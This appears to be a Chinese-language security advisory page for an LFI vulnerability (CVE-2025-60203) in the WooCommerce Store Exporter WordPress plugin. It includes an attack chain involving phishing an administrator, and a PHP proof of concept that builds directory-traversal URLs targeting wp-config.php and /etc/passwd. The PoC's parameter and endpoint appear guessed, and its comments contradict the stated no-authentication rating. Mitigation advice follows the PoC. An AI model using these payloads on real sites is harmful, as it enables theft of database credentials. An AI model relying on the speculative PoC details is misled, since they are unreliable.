CVE-2025-60203 WooCommerce Store Exporter 本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60203

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WooCommerce Store Exporter (by Josh Kohlbach)

漏洞概述

CVE-2025-60203是WordPress插件WooCommerce Store Exporter中的一个高危本地文件包含漏洞。该漏洞由Patchstack安全团队的审计人员发现，CVSS评分达到7.5分，属于高危级别。漏洞根源在于PHP程序对文件名参数缺乏适当的控制，导致攻击者可以通过构造恶意请求包含服务器上的任意本地文件。这种文件包含漏洞可能使攻击者读取敏感配置文件、获取数据库凭据、甚至在特定条件下实现远程代码执行。WooCommerce Store Exporter是一款广泛使用的WordPress插件，用于导出WooCommerce商店中的产品、订单、客户等数据。由于该插件在WordPress生态中的普及性，此漏洞可能影响大量使用该插件的电商网站。攻击者无需认证即可利用此漏洞，但需要一定的用户交互（如诱导管理员访问恶意链接）。漏洞影响版本从任意版本到2.7.6，建议所有使用该插件的用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，源于应用程序对用户可控的输入参数验证不足。在WooCommerce Store Exporter插件的代码中，某个功能模块直接使用未经充分过滤的用户输入作为include/require语句的文件路径参数。攻击者可以通过目录遍历技术(如使用../../../etc/passwd或../../wp-config.php等路径)来读取服务器上的敏感文件。典型的利用场景包括：1) 通过包含wp-config.php获取数据库凭证；2) 包含日志文件或session文件实现代码执行；3) 读取/etc/passwd进行信息收集。在某些配置下，如果allow_url_include被启用，还可能演变为远程文件包含(RFI)。漏洞的利用需要攻击者诱导具有管理权限的用户访问特制的链接或页面，从而触发文件包含操作。修复方案应在文件包含逻辑前增加严格的输入验证，限制只能包含白名单内的文件，并使用realpath()函数验证最终路径。

攻击链分析

STEP 1

1

信息收集：攻击者扫描目标网站，确认安装了WooCommerce Store Exporter插件及其版本

STEP 2

2

构造恶意请求：攻击者构造包含目录遍历payload的URL，如?tab=../../../../wp-config.php

STEP 3

3

社工诱导：攻击者通过钓鱼邮件、即时消息等方式诱导WordPress管理员访问恶意链接

STEP 4

4

触发漏洞：管理员点击链接后，服务器执行文件包含操作，返回敏感文件内容

STEP 5

5

数据窃取：攻击者获取wp-config.php中的数据库凭据或其他敏感配置信息

STEP 6

6

持久化控制：在获取凭据后，攻击者可进一步植入webshell或建立后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60203 PoC - WooCommerce Store Exporter Local File Inclusion
 * Target: WordPress with WooCommerce Store Exporter plugin <= 2.7.6
 * 
 * Usage: Modify TARGET_URL and run with PHP CLI
 * Example: php cve-2025-60203_poc.php
 */

// Configuration - Modify these values
define('TARGET_URL', 'http://target-site.com');
define('WP_PATH', '/wp-content/plugins/woocommerce-exporter/');

// Vulnerable parameter (identified through code review)
$vulnerable_param = 'tab';  // Common vulnerable parameter in admin pages

// Files to attempt to read
$target_files = [
    '../../../../wp-config.php',      // WordPress config with DB credentials
    '../../../../../../etc/passwd',   // System file
    '../../wp-load.php',              // WordPress core file
];

echo "[*] CVE-2025-60203 PoC - WooCommerce Store Exporter LFI\n";
echo "[*] Target: " . TARGET_URL . "\n\n";

foreach ($target_files as $file) {
    echo "[+] Attempting to include: $file\n";
    
    // Construct exploit URL
    $exploit_url = TARGET_URL . WP_PATH . "export.php?" . 
                   $vulnerable_param . "=" . urlencode($file);
    
    echo "[*] URL: $exploit_url\n";
    
    // In real attack, this would be sent via social engineering to admin
    // or exploited through stored XSS if present
    
    // Note: This is for educational purposes only
    // Actual exploitation requires proper context and authentication bypass
}

echo "\n[!] This PoC demonstrates the vulnerability structure.";
echo "\n[!] For actual testing, use Burp Suite or similar tools.\n";
?>

影响范围

WooCommerce Store Exporter <= 2.7.6

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web服务器配置中限制对插件目录的访问；2) 通过.htaccess或Nginx配置阻止包含敏感文件路径的请求；3) 临时禁用该插件直到完成升级；4) 加强管理员账户安全，使用强密码和双因素认证；5) 监控访问日志中的异常请求模式。